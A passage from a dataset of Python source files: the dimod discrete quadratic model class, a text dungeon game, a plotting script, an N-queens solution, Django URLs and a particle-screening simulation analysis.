dqm.set_quadratic(p0, p1, {(c, c): 1 for c in colors})\n\n The next examples show how to view and manipulate the model biases.\n\n >>> dqm = dimod.DiscreteQuadraticModel()\n\n Add the variables to the model\n\n >>> u = dqm.add_variable(5) # unlabeled variable with 5 cases\n >>> v = dqm.add_variable(3, label='v') # labeled variable with 3 cases\n\n The linear biases default to 0. They can be read by case or by batch.\n\n >>> dqm.get_linear_case(u, 1)\n 0.0\n >>> dqm.get_linear(u)\n array([0., 0., 0., 0., 0.])\n >>> dqm.get_linear(v)\n array([0., 0., 0.])\n\n The linear biases can be overwritten either by case or in a batch.\n\n >>> dqm.set_linear_case(u, 3, 17)\n >>> dqm.get_linear(u)\n array([ 0., 0., 0., 17., 0.])\n >>> dqm.set_linear(v, [0, -1, 3])\n >>> dqm.get_linear(v)\n array([ 0., -1., 3.])\n\n The quadratic biases can also be manipulated sparsely or densely.\n\n >>> dqm.set_quadratic(u, v, {(0, 2): 1.5})\n >>> dqm.get_quadratic(u, v)\n {(0, 2): 1.5}\n >>> dqm.get_quadratic(u, v, array=True) # as a NumPy array\n array([[0. , 0. , 1.5],\n [0. , 0. , 0. ],\n [0. , 0. , 0. ],\n [0. , 0. , 0. ],\n [0. , 0. , 0. ]])\n >>> dqm.set_quadratic_case(u, 2, v, 1, -3)\n >>> dqm.get_quadratic(u, v, array=True)\n array([[ 0. , 0. , 1.5],\n [ 0. , 0. , 0. ],\n [ 0. , -3. , 0. ],\n [ 0. , 0. , 0. ],\n [ 0. , 0. , 0. ]])\n >>> dqm.get_quadratic(u, v) # doctest:+SKIP\n {(0, 2): 1.5, (2, 1): -3.0}\n\n \"\"\"\n\n def __init__(self):\n self.variables = _Variables()\n self._cydqm = cyDiscreteQuadraticModel()\n\n @property\n def adj(self):\n \"\"\"dict[hashable, set]: The adjacency structure of the variables.\"\"\"\n return dict((self.variables[ui],\n set(self.variables[vi] for vi in neighborhood))\n for ui, neighborhood in enumerate(self._cydqm.adj))\n\n def add_variable(self, num_cases, label=None):\n \"\"\"Add a discrete variable.\n\n Args:\n num_cases (int):\n The number of cases in the variable. Must be a positive\n integer.\n\n label (hashable, optional):\n A label for the variable. Can be any hashable except `None`.\n Defaults to the length of the discrete quadratic model, if that\n label is available. 
Otherwise defaults to the lowest available\n positive integer label.\n\n Returns:\n The label of the new variable.\n\n Raises:\n ValueError: If `label` already exists as a variable label.\n TypeError: If `label` is not hashable.\n\n \"\"\"\n self.variables._append(label)\n variable_index = self._cydqm.add_variable(num_cases)\n assert variable_index + 1 == len(self.variables)\n return self.variables[-1]\n\n # todo: support __copy__ and __deepcopy__\n def copy(self):\n \"\"\"Return a copy of the discrete quadratic model.\"\"\"\n new = type(self)()\n new._cydqm = self._cydqm.copy()\n for v in self.variables:\n new.variables._append(v)\n return new\n\n def energy(self, sample):\n energy, = self.energies(sample)\n return energy\n\n def energies(self, samples):\n samples, labels = as_samples(samples, dtype=self._cydqm.case_dtype)\n\n # reorder as needed\n if len(labels) != self.num_variables():\n raise ValueError(\n \"Given sample(s) have incorrect number of variables\")\n if self.variables != labels:\n # need to reorder the samples\n label_to_idx = dict((v, i) for i, v in enumerate(labels))\n\n try:\n order = [label_to_idx[v] for v in self.variables]\n except KeyError:\n raise ValueError(\"given samples-like does not match labels\")\n\n samples = samples[:, order]\n\n return np.asarray(self._cydqm.energies(samples))\n\n @classmethod\n def _from_file_numpy(cls, file_like):\n\n magic = file_like.read(len(DATA_MAGIC_PREFIX))\n if magic != DATA_MAGIC_PREFIX:\n raise ValueError(\"unknown file type, expected magic string {} but \"\n \"got {}\".format(DATA_MAGIC_PREFIX, magic))\n\n length = np.frombuffer(file_like.read(4), '>> dqm = dimod.DiscreteQuadraticModel()\n >>> u = dqm.add_variable(5)\n >>> v = dqm.add_variable(3, label='3var')\n >>> dqm.set_quadratic(u, v, {(0, 2): 1})\n >>> vectors = dqm.to_numpy_vectors()\n >>> new = dimod.DiscreteQuadraticModel.from_numpy_vectors(*vectors)\n\n See Also:\n :meth:`~DiscreteQuadraticModel.to_numpy_vectors`\n\n \"\"\"\n\n obj = cls()\n\n obj._cydqm = cyDiscreteQuadraticModel.from_numpy_vectors(\n case_starts, linear_biases, quadratic)\n\n if labels is not None:\n if len(labels) != obj._cydqm.num_variables():\n raise ValueError(\n \"labels does not match the length of the DQM\"\n )\n\n for v in labels:\n obj.variables._append(v)\n else:\n for v in range(obj._cydqm.num_variables()):\n obj.variables._append()\n\n return obj\n\n def get_linear(self, v):\n \"\"\"The linear biases associated with variable `v`.\n\n Args:\n v: A variable in the discrete quadratic model.\n\n Returns:\n :class:`~numpy.ndarray`: The linear biases in an array.\n\n \"\"\"\n return self._cydqm.get_linear(self.variables.index(v))\n\n def get_linear_case(self, v, case):\n \"\"\"The linear bias associated with case `case` of variable `v`.\n\n Args:\n v: A variable in the discrete quadratic model.\n\n case (int): The case of `v`.\n\n Returns:\n The linear bias.\n\n \"\"\"\n return self._cydqm.get_linear_case(self.variables.index(v), case)\n\n def get_quadratic(self, u, v, array=False):\n \"\"\"The biases associated with the interaction between `u` and `v`.\n\n Args:\n u: A variable in the discrete quadratic model.\n\n v: A variable in the discrete quadratic model.\n\n array (bool, optional, default=False): If True, a dense array is\n returned rather than a dict.\n\n Returns:\n The quadratic biases. 
If `array=False`, returns a dictionary of the\n form `{case_u, case_v: bias, ...}`\n If `array=True`, returns a\n :meth:`~DiscreteQuadraticModel.num_cases(u)` by\n :meth:`~DiscreteQuadraticModel.num_cases(v)` numpy array.\n\n \"\"\"\n return self._cydqm.get_quadratic(\n self.variables.index(u),\n self.variables.index(v),\n array=array)\n\n def get_quadratic_case(self, u, u_case, v, v_case):\n \"\"\"The bias associated with the interaction between two cases of `u`\n and `v`.\n\n Args:\n u: A variable in the discrete quadratic model.\n\n u_case (int): The case of `u`.\n\n v: A variable in the discrete quadratic model.\n\n v_case (int): The case of `v`.\n\n Returns:\n The quadratic bias.\n\n \"\"\"\n return self._cydqm.get_quadratic_case(\n self.variables.index(u), u_case, self.variables.index(v), v_case)\n\n def num_cases(self, v=None):\n \"\"\"If v is provided, the number of cases associated with v, otherwise\n the total number of cases in the DQM.\n \"\"\"\n if v is None:\n return self._cydqm.num_cases()\n return self._cydqm.num_cases(self.variables.index(v))\n\n def num_case_interactions(self):\n \"\"\"The total number of case interactions.\"\"\"\n return self._cydqm.num_case_interactions()\n\n def num_variable_interactions(self):\n \"\"\"The total number of variable interactions\"\"\"\n return self._cydqm.num_variable_interactions()\n\n def num_variables(self):\n \"\"\"The number of variables in the discrete quadratic model.\"\"\"\n return self._cydqm.num_variables()\n\n def relabel_variables(self, mapping, inplace=True):\n if not inplace:\n return self.copy().relabel_variables(mapping, inplace=True)\n self.variables._relabel(mapping)\n return self\n\n def relabel_variables_as_integers(self, inplace=True):\n \"\"\"Relabel the variables of the DQM to integers.\n\n Args:\n inplace (bool, optional, default=True):\n If True, the discrete quadratic model is updated in-place;\n otherwise, a new discrete quadratic model is returned.\n\n Returns:\n tuple: A 2-tuple containing:\n\n A discrete quadratic model with the variables relabeled. If\n `inplace` is set to True, returns itself.\n\n dict: The mapping that will restore the original labels.\n\n \"\"\"\n if not inplace:\n return self.copy().relabel_variables_as_integers(inplace=True)\n return self, self.variables._relabel_as_integers()\n\n def set_linear(self, v, biases):\n \"\"\"Set the linear biases associated with `v`.\n\n Args:\n v: A variable in the discrete quadratic model.\n\n biases (array-like): The linear biases in an array.\n\n \"\"\"\n self._cydqm.set_linear(self.variables.index(v), np.asarray(biases))\n\n def set_linear_case(self, v, case, bias):\n \"\"\"The linear bias associated with case `case` of variable `v`.\n\n Args:\n v: A variable in the discrete quadratic model.\n\n case (int): The case of `v`.\n\n bias (float): The linear bias.\n\n \"\"\"\n self._cydqm.set_linear_case(self.variables.index(v), case, bias)\n\n def set_quadratic(self, u, v, biases):\n \"\"\"Set biases associated with the interaction between `u` and `v`.\n\n Args:\n u: A variable in the discrete quadratic model.\n\n v: A variable in the discrete quadratic model.\n\n biases (array-like/dict):\n The quadratic biases. If a dict, then a dictionary of the\n form `{case_u, case_v: bias, ...}`. 
Otherwise, then should be,\n a :meth:`~DiscreteQuadraticModel.num_cases(u)` by\n :meth:`~DiscreteQuadraticModel.num_cases(v)` array-like.\n\n \"\"\"\n self._cydqm.set_quadratic(\n self.variables.index(u),\n self.variables.index(v),\n biases)\n\n def set_quadratic_case(self, u, u_case, v, v_case, bias):\n \"\"\"Set the bias associated with the interaction between two cases of\n `u` and `v`.\n\n Args:\n u: A variable in the discrete quadratic model.\n\n u_case (int): The case of `u`.\n\n v: A variable in the discrete quadratic model.\n\n v_case (int): The case of `v`.\n\n bias (float): The quadratic bias.\n\n \"\"\"\n self._cydqm.set_quadratic_case(\n self.variables.index(u), u_case,\n self.variables.index(v), v_case,\n bias)\n\n def _to_file_numpy(self, file, compress):\n # the biases etc, saved using numpy\n\n # we'd like to just let numpy handle the header etc, but it doesn't\n # do a good job of cleaning up after itself in np.load, so we record\n # the section length ourselves\n file.write(DATA_MAGIC_PREFIX)\n file.write(b' ') # will be replaced by the length\n start = file.tell()\n\n vectors = self.to_numpy_vectors()\n\n if compress:\n save = np.savez_compressed\n else:\n save = np.savez\n\n save(file,\n case_starts=vectors.case_starts,\n linear_biases=vectors.linear_biases,\n quadratic_row_indices=vectors.quadratic.row_indices,\n quadratic_col_indices=vectors.quadratic.col_indices,\n quadratic_biases=vectors.quadratic.biases,\n )\n\n # record the length\n end = file.tell()\n file.seek(start-4)\n file.write(np.dtype(' \")\n if choice == \"1\":\n if len(enemies) < 1:\n os.system(\"clear\")\n print(\"All enemies are dead, you are just swinging at the air\")\n return\n count = 1\n for enemy in enemies:\n print(enemy.name, count)\n count += 1\n choice = None\n while not choice:\n try:\n choice = int(input(\"Select target > \"))\n except:\n print(\"Please enter numeric value\")\n choice -=1\n os.system(\"clear\")\n if choice < len(enemies):\n attacked = 0\n for item in order:\n if combat_order[item] == player:\n rolls = player.attack(enemies[choice])\n print(\"player attacks {2}, {3} rolls {0}, {2} rolls {1}\".format(rolls[0], rolls[1], enemies[choice].name, player.name))\n if rolls[0][0] >= rolls[1][0]:\n print(player.name, \"strikes\", enemies[choice].name)\n if enemies[choice].life <= 0:\n print(enemies[choice].name, \" has been slain\")\n enemies.pop(choice)\n elif attacked == 0:\n if combat_order[item].life > 0:\n rolls = combat_order[item].attack(player)\n print(combat_order[item].name, \"attacks\", player.name + \",\", \"{2} rolls {0}, {3} rolls {1}\".format(rolls[0], rolls[1], combat_order[item].name, player.name))\n if rolls[0][0] >= rolls[1][0]:\n print(combat_order[item].name, \"strikes\", player.name)\n if player.life <= 0:\n print(player.name, \"has been slain\")\n return False\n attacked = 1\n elif choice == \"2\":\n os.system(\"clear\")\n print(\"current life is :\",player.life)\n elif choice == \"3\":\n count = 1\n os.system(\"clear\")\n for enemy in enemies:\n print(enemy.name, enemy.life)\n count += 1\n elif choice == \"4\":\n num = 1\n os.system(\"clear\")\n for item in player.inventory:\n print(str(num), \":\", item.name)\n num += 1\n elif choice == \"5\":\n num = 1\n for item in player.inventory:\n print(str(num), \":\", item.name)\n num += 1\n try:\n choice = int(input(\"select potion > \"))\n except:\n os.system(\"clear\")\n print(\"invalid input\")\n return\n for _id,victim in combat_order.items():\n print(_id, \":\", victim.name)\n try:\n target = int(input(\"select 
target > \"))\n except:\n os.system(\"clear\")\n print(\"invalid input\")\n return\n try:\n os.system(\"clear\")\n if isinstance(player.inventory[choice-1], items.Potion):\n player.inventory[choice-1].use_potion(combat_order[target])\n if player.inventory[choice-1].effect < 4:\n if combat_order[target] == player:\n print(\"You feel stronger\")\n else:\n print(combat_order[target].name, \"looks stronger\")\n elif player.inventory[choice-1].effect < 7:\n if combat_order[target] == player:\n print(\"You feel ill\")\n else:\n print(combat_order[target].name, \"looks ill\")\n elif player.inventory[choice-1].effect == 7:\n if combat_order[target] == player:\n print(\"You feel crazy\")\n else:\n print(combat_order[target].name, \"looks crazy\")\n player.inventory.pop(choice-1)\n else:\n print(player.inventory[choice-1].name, \"is not a potion\")\n except:\n \n print(\"invalid selection\")\n elif choice == \"6\":\n if len(enemies) < 1 or player.found == False:\n next_room(player.found, dungeon)\n else:\n os.system(\"clear\")\n print(\"You are in combat currently\")\n elif choice == \"q\":\n choice = input(\"1: save\\nanything else: quit\\n> \")\n if choice == \"1\":\n file = open(\"dungeon.dat\",\"wb\")\n pickle.dump(dungeon, file)\n file.close()\n file = open(\"player.dat\",\"wb\")\n pickle.dump(player, file)\n file.close()\n print(\"game saved in dungeon.dat and player.dat, please do not touch\")\n quit()\n else: \n quit()\n elif choice == \"~tgm\":\n print(\"The power of a thousand suns flows within you as you ascend to demigod status\")\n player.life = 100000000\n return\n\ndef next_room(found, dungeon):\n \"\"\"\n move the player into the next room\n \"\"\"\n if not found:\n print(\"You can attempt to avoid combat and move on to the next room, you however will not receive any loot\")\n choice = input(\"1: attempt to skip the room\\nelse: jump headlong into the room screaming bloody murder\\n\")\n if choice == \"1\":\n fail = False\n for monster in range(len(dungeon.rooms[dungeon.room].monsters)):\n if random.randint(0,12) < dungeon.rooms[dungeon.room].monsters[monster].inish:\n fail = True\n if fail == False:\n dungeon.skip = 1\n print(\"Choose your path, 1 - {0}: forward\".format(len(dungeon.rooms[dungeon.room].doors)-1))\n try:\n choice = int(input(\"> \"))\n if choice > 0:\n dungeon.room += 1\n dungeon.difficulty += random.randint(-3,3)+random.choice([choice, -choice])\n if dungeon.difficulty < 2:\n dungeon.difficulty = 2\n else:\n dungeon.room += 1\n dungeon.difficulty += 1\n except:\n print(\"You were spotted trying to escape\")\n else:\n print(\"You were spotted trying to escape\")\n else:\n print(\"With the monsters dead, you are free to move on to another room, there are {0} doors to choose from\".format(len(dungeon.rooms[dungeon.room].doors)-1))\n print(\"Choose your path, 1 - {0}: forward\".format(len(dungeon.rooms[dungeon.room].doors)-1))\n try:\n choice = int(input(\"> \"))\n dungeon.skip = 2\n if choice > 0:\n dungeon.room += 1\n if choice < len(dungeon.rooms[dungeon.room].doors):\n dungeon.difficulty += random.choice([choice, -choice])\n if dungeon.difficulty < 1:\n dungeon.difficulty = 1\n else:\n dungeon.difficulty += random.randint(1,20)\n else:\n dungeon.room += 1\n dungeon.difficulty += random.randint(1,10)\n except:\n dungeon.skip = 2\n dungeon.room += 1\n dungeon.difficulty += random.randint(1,10)\n\ndef populate_room(dungeon, room, monster_list, boss = 0):\n \"\"\"\n fills the room with monsters\n \"\"\"\n for monster in range(len(room.monsters)):\n spawn = 
monster_list[monster % len(monster_list)]\n if boss == 1:\n hits = int(dungeon.difficulty+random.randint(1,4) / 3)\n if hits == 0:\n hits = 1\n elif hits > 3:\n hits = 3\n room.monsters[monster] = actor.Enemy(spawn, hits+3, 0, 0, 0)\n else:\n hits = int(dungeon.difficulty+random.randint(1,4) / 3)\n if hits == 0:\n hits = 1\n elif hits > 3:\n hits = 3\n room.monsters[monster] = actor.Enemy(spawn, hits, 0, 0, random.randint(-2, 0))\n\ndef game(player, dungeon, max_rooms):\n \"\"\"\n main game body\n \"\"\"\n while player.life > 0 and dungeon.room < max_rooms:\n player.reset_stats()\n player.inish = random.randint(1,6)\n dungeon.generate_room(dungeon.room, random.randint(2,4))\n populate_room(dungeon, dungeon.rooms[dungeon.room], enemy_list[random.randint(0,len(enemy_list)-1)])\n dungeon.skip = 0\n print(\"{0}, there are {1} doors in adition to the one you came through\\nThere are {2} monsters in the room\".format(room_descs[random.randint(0, len(room_descs)-1)], len(dungeon.rooms[dungeon.room].doors)-1, len(dungeon.rooms[dungeon.room].monsters)))\n player.found = False\n for monster in range(actor.Enemy.counter):\n if player.inish < dungeon.rooms[dungeon.room].monsters[monster].inish:\n player.found = True\n if not player.found:\n print(\"You have not been noticed\")\n while 1:\n combat(player, dungeon)\n player.found = True\n if dungeon.skip > 0:\n break\n elif player.life < 1:\n break\n if dungeon.skip == 1:\n continue\n if player.life <= 0:\n break\n os.system(\"clear\")\n loot = int(random.randint(1,120) / 10)\n if loot < 8:\n player.loot_item(items.Potion(potion_descs[loot-1], loot))\n print(\"You have looted {0}\".format(potion_descs[loot-1]))\n else:\n player.loot_item(items.Treasure(junk_treasure[random.randint(0, len(junk_treasure)-1)]))\n print(\"You have looted some treasure\")\n if player.life > 0:\n player.reset_stats()\n player.inish = random.randint(1,6)\n dungeon.generate_room(dungeon.room, 1, 1)\n populate_room(dungeon, dungeon.rooms[dungeon.room], boss_list[random.randint(0,len(boss_list)-1)], 1)\n dungeon.skip = 0\n print(\"As you enter the final chamber of the dungeon, a {0} is found in the room, as though placed there by some higher power\".format(dungeon.rooms[dungeon.room].monsters[0].name))\n while len(dungeon.rooms[dungeon.room].monsters) > 0:\n player.found = True\n combat(player, dungeon)\n if dungeon.skip > 0:\n break\n elif player.life < 1:\n break\n print(\"\\nYou have completed the dungeon, way to go\\nCheat mode is ~tgm during the game\")\n\n\ndef main():\n \"\"\"\n main launching point of the program\n \"\"\"\n print(\"Welcome to Dungeon Quest!\")\n print(\"1: New game\\n2: Load game\")\n choice = input(\"Selection > \")\n if choice == \"1\":\n player = input(\"Enter player name > \")\n os.system(\"clear\")\n print(\"Welcome {0}, in this world you will face many challenges, and face possible death\".format(player))\n print(\"Choose difficulty\\n1:easy - 2-4 floors\\n2:medium 3-7 floors\\n3:hard 7-10 floors\")\n challenge = input(\"Selection > \")\n if challenge == \"1\":\n max_rooms = random.randint(1,3)\n elif challenge == \"2\":\n max_rooms = random.randint(2,6)\n elif challenge == \"3\":\n max_rooms = random.randint(6,9)\n else:\n print(\"{0}: invalid input\\ndefaulting to 10 rooms, good luck\".format(challenge))\n max_rooms = 9\n dungeon = d.Map(max_rooms+2, 1)\n dungeon.room = 0\n player = actor.Hero(player)\n os.system(\"clear\")\n game(player, dungeon, max_rooms)\n elif choice == \"2\":\n try:\n file = open(\"dungeon.dat\", \"rb\")\n dungeon = 
pickle.load(file)\n file.close()\n file = open(\"player.dat\", \"rb\")\n player = pickle.load(file)\n file.close()\n os.system(\"clear\")\n game(player, dungeon, dungeon.room_count-1)\n except:\n print(\"missing or corrupt .dat file(s)\")\n return\n else:\n return\n\nif __name__ == \"__main__\":\n os.system(\"clear\")\n main()\n\n\n","sub_path":"dungeon_dudes.py","file_name":"dungeon_dudes.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"165419565","text":"# -*- coding: utf-8 -*-\nfrom common import read, plot\nimport pandas as pd\nimport sys\nimport os\nkeCity = ['天津']\ndef plotArea(city, area):\n if city in keCity:\n cmd = 'python2.7 spider/chengJiaoSpiderKe.py %s %s'%(city, area)\n else:\n cmd = 'python2.7 spider/chengJiaoSpider.py %s %s'%(city, area)\n #os.system(cmd)\n df = read(area)\n gp = df.groupby(['成交时间'])['成交价(元/平)']\n res=pd.DataFrame({\"volume\":gp.size(),\"median_price\":gp.median(), \"mean_price\":gp.mean()})\n res = res.iloc[:len(res),:]\n city = 'default'\n MA = True\n start_date = None\n force = True\n keep_all = True\n for ma_length in [1, 30, 60, 90]:\n title = '%s-%d日均线'%(area, ma_length)\n plot(res, city, title, MA, ma_length, start_date, force, keep_all)\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n city = sys.argv[1]\n area = sys.argv[2]\n plotArea(city, area)\n else:\n print(\"usage: python3 plotArea.py [city] [area]\")\n","sub_path":"plotArea.py","file_name":"plotArea.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"81349280","text":"#Type Theory,Set Theory,Category Theory\nfrom meta import Omni,Type\nfrom math import AxiomaticSystem\n\n# A set in set theory\nclass Set(Type):\n Virtor='Set'\n domain=set(['SetTheory'])\n realm=set(['Omni'])\n \n# placeholders for set operations: union, intersection, CartesianProduct\nemptySet=Set('emptySet')\nVonNeumannUniverse=Type('VonNeumannUniverse')# A universal class.\n\nZermeloFraenkelSetTheory=AxiomaticSystem('ZermeloFraenkelSetTheory')# An axiomatic system for set theory","sub_path":"type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"509296391","text":"class Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n ans = []\n positions = [0]*n\n\n # print a solution board\n def printQueue(positions, n):\n strings = []\n for i in positions:\n s = \"\"\n for j in range(n):\n if j == i:\n s += \"Q\"\n else:\n s += \".\"\n strings.append(s)\n ans.append(strings)\n \n # positions: array of queen column positions, one per row\n def isOk(positions, n):\n sum1 = {positions[0]}\n sum2 = {0-positions[0]}\n cols = {positions[0]}\n for i in range(1, n):\n hang_x, hang_y = i + positions[i], i - positions[i]\n if positions[i] in cols or hang_x in sum1 or hang_y in sum2:\n return False\n cols.add(positions[i])\n sum1.add(hang_x)\n sum2.add(hang_y)\n return True\n \n # backtrack over rows to find placements\n def backTrack(r_index, n, positions):\n if r_index == n:\n if isOk(positions, n):\n printQueue(positions, n)\n return\n for i in range(n):\n positions[r_index] = i\n if isOk(positions, r_index + 1):\n backTrack(r_index+1, n, positions) \n\n backTrack(0, n, positions)\n return ans","sub_path":"LeetCode/51. N皇后2nd.py","file_name":"51. N皇后2nd.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
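The solveNQueens record above re-validates the whole prefix with isOk after every placement. The same row-and-diagonal bookkeeping is often kept incrementally in sets, which makes each placement test O(1) instead of a rescan; a minimal standalone sketch of that variant (all names here are illustrative, not from the record):

```python
# Incremental N-queens: track occupied columns and diagonals in sets so each
# candidate square is checked in O(1), backtracking by removing the marks.
def count_n_queens(n: int) -> int:
    cols, diag_sum, diag_diff = set(), set(), set()

    def place(row: int) -> int:
        if row == n:
            return 1
        total = 0
        for col in range(n):
            # row+col is constant along one diagonal, row-col along the other
            if col in cols or (row + col) in diag_sum or (row - col) in diag_diff:
                continue
            cols.add(col); diag_sum.add(row + col); diag_diff.add(row - col)
            total += place(row + 1)
            cols.remove(col); diag_sum.remove(row + col); diag_diff.remove(row - col)
        return total

    return place(0)

assert count_n_queens(8) == 92  # the classic count for an 8x8 board
```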
N皇后2nd.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231228503","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nimport apps.blog.urls\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', 'apps.blog.views.index', name='home'),\n url(r'^blog/', include('apps.blog.urls', namespace='blog')),\n #url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n #url(r'^grappelli/',include('grappelli.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^sitemap.xml', 'apps.blog.views.sitemap'),\n url(r'^baidu_verify_3ymtDfPE09.html', 'apps.blog.views.baidu'),\n \n)\n","sub_path":"django_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"468868697","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n[Function Description]\n----------------------------------------------------------------------------------------------------\nDevide the screen line into 5 sections evenly\nCalculate the sum of particles which contact and penetrate the screen in 5 sections respectively\n----------------------------------------------------------------------------------------------------\n\"\"\"\n\nimport os\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom csv_process import data_process\nfrom ptc_scn_calculation import mass_position_times\n\n# Display all the columns of DataFrame\npd.set_option('display.max_columns', None)\n# Display all the columns of DataFrame within a single row\npd.set_option('display.width', None)\n\n\ndef ptc_position(df_data_time, below_r_x):\n \"\"\"\n 定义筛上、筛下颗粒的位置\n 参数:\n df_data_time:某个时刻的DataFrame\n below_r_x:筛箱中筛下颗粒空间的最右端点的x坐标\n \"\"\"\n ser_ptc_x = df_data_time.ptc_x\n ser_ptc_z = df_data_time.ptc_z\n ser_scn_z = df_data_time.scn_z_lower\n scn_r_x = df_data_time.scn_r_x[0] # 上筛面右端点的x坐标\n # 定义筛上颗粒(颗粒球心在下筛面以上的颗粒)\n ptc_up = df_data_time[(ser_ptc_z >= ser_scn_z) & (ser_ptc_x <= scn_r_x)]\n # 定义筛下颗粒(颗粒球心在下筛面以下的颗粒)\n ptc_down = df_data_time[(ser_ptc_z < ser_scn_z) & (ser_ptc_x < below_r_x)]\n\n return ptc_up, ptc_down\n\n\ndef section_split(df_data_time):\n \"\"\"\n 1.读取某个时刻的DataFrame,获取上筛面端点值的x坐标,将筛网的水平投影距离均分为5段\n 2.将每段的起点和终点存为list,再将5个list存到1个包括所有段的起点终点位置的list中\n \"\"\"\n # 获取上筛面端点值的x坐标\n scn_l_x = df_data_time.scn_l_x[0]\n scn_r_x = df_data_time.scn_r_x[0]\n section_num = 5 # 将筛面均分为5段\n section_lmit_list = np.linspace(scn_l_x, scn_r_x, section_num + 1)\n interval_list = []\n for i in range(len(section_lmit_list) - 1):\n section_interval = [section_lmit_list[i], section_lmit_list[i + 1]]\n interval_list.append(section_interval)\n\n return interval_list # interval_list形如:[[a,b],[b,c],[c,d]...]\n\n\ndef ptc_section(data_times, below_r_x, end_index):\n \"\"\"\n 1.遍历所有筛下颗粒的id,根据id遍历从开始到筛分结束时刻的所有df\n 2.判断该id是否存在于该df中,若有,判断哪个时刻的df中ptc_z < scn_z_lower\n 3.读取该时刻该相应id的颗粒整行数据,判断该颗粒的ptc_x处于筛网哪一段,然后将整行数据append到该段的DataFrame中\n 4.将所有包含透筛颗粒数据分段的DataFrame存储在list中\n \"\"\"\n # 统计结束筛分时刻所有的筛下颗粒\n df_ptc_above, df_ptc_below = ptc_position(data_times[end_index], below_r_x)\n # 将所有筛下颗粒的id转换为list,用于后面遍历id寻找该id颗粒透筛位置\n below_id_list = df_ptc_below['ptc_id'].tolist()\n # 创建5个空DataFrame,分别根据筛下颗粒刚透筛时刻的x值将该颗粒的所有信息(按颗粒id逐行添加)存储在相应筛段的DataFrame中\n df_section1 = pd.DataFrame()\n df_section2 = pd.DataFrame()\n df_section3 = pd.DataFrame()\n df_section4 = 
pd.DataFrame()\n df_section5 = pd.DataFrame()\n # 遍历筛下颗粒id。根据id遍历开始到结束筛分时刻,寻找该id颗粒刚透筛时刻的,并将该时刻该id颗粒的信息添加到DataFrame中\n for ptc_id in below_id_list:\n # 遍历开始到结束筛分时刻的DataFrame(结束时刻的索引务必+1,range取不到第二个值,有可能刚好在end_time时成为筛下颗粒)\n for df_index in range(1, end_index + 1):\n # 判断该颗粒id是否是该DataFrame的'ptc_id'列中的值\n if ptc_id in data_times[df_index]['ptc_id'].values:\n # 是,则执行以下命令,计算该id的颗粒在该DataFrame中,颗粒与下筛面的相对位置(有正负之分)\n index_single = data_times[df_index][data_times[df_index]['ptc_id'] == ptc_id].index\n ptc_z = data_times[df_index]['ptc_z'][index_single].values\n scn_z = data_times[df_index]['scn_z_lower'][index_single].values\n ptc_scn_dstc = ptc_z - scn_z\n # 若颗粒与下筛面的距离小于0,则满足要求,判断其在哪个筛段透筛,并结束该颗粒的遍历(最上层的for循环)\n if ptc_scn_dstc < 0:\n ptc_data_ser = data_times[df_index].iloc[index_single]\n ptc_below_x = ptc_data_ser['ptc_x'].values # 必须加values属性,否则为Series\n # 计算该时刻的筛段划分\n section_list = section_split(data_times[df_index])\n # 遍历该时刻的所有筛段,一旦该颗粒的x值满足某一段,即添加到该段的DataFrame中,退出该颗粒的遍历\n for sect_index in range(len(section_list)):\n section = section_list[sect_index]\n if (ptc_below_x >= section[0]) & (ptc_below_x <= section[1]):\n if sect_index == 0:\n df_section1 = df_section1.append(ptc_data_ser)\n df_section1 = df_section1.reset_index(drop=True)\n if sect_index == 1:\n df_section2 = df_section2.append(ptc_data_ser)\n df_section2 = df_section2.reset_index(drop=True)\n if sect_index == 2:\n df_section3 = df_section3.append(ptc_data_ser)\n df_section3 = df_section3.reset_index(drop=True)\n if sect_index == 3:\n df_section4 = df_section4.append(ptc_data_ser)\n df_section4 = df_section4.reset_index(drop=True)\n if sect_index == 4:\n df_section5 = df_section5.append(ptc_data_ser)\n df_section5 = df_section5.reset_index(drop=True)\n break\n # 将各个筛段的DataFrame添加到1个list中\n list_ptc_sections = [df_section1, df_section2, df_section3, df_section4, df_section5]\n\n return df_ptc_below, list_ptc_sections\n\n\ndef ptc_section_ratio(data_times, below_r_x, end_index, diam_ratio):\n \"\"\"\n 1.筛选出(1)所有筛下颗粒中小于分离粒度的颗粒(2)筛网各部分透筛颗粒之中小于分离粒度的颗粒,并计算其质量之和\n 2.计算筛网各部分透筛颗粒与所有筛下颗粒的质量之比\n end_index:筛分结束时刻\n \"\"\"\n # 根据分离比计算分离粒度\n diam_scn = 5 # 筛孔宽度\n diam_targ = diam_scn * diam_ratio\n # 计算该实验筛分结束时刻所有透筛颗粒的透筛位置,并根据透筛时刻的x值分段\n ptc_below_df, ptc_sections_list = ptc_section(data_times, below_r_x, end_index)\n # 定义筛下颗粒中小于分离粒径的颗粒,并求其总质量\n below_diam_df = ptc_below_df[ptc_below_df['ptc_diam'] <= diam_targ]\n below_diam_mass = below_diam_df['ptc_mass'].sum()\n # 遍历各个筛网分段,定义透筛颗粒中小于分离粒度的颗粒,并计算其总质量。计算分段透筛比(质量比),并添加到list中\n list_section_ratio = []\n for section_df in ptc_sections_list:\n section_diam_df = section_df[section_df['ptc_diam'] <= diam_targ]\n section_diam_mass = section_diam_df['ptc_mass'].sum()\n section_ratio = section_diam_mass / 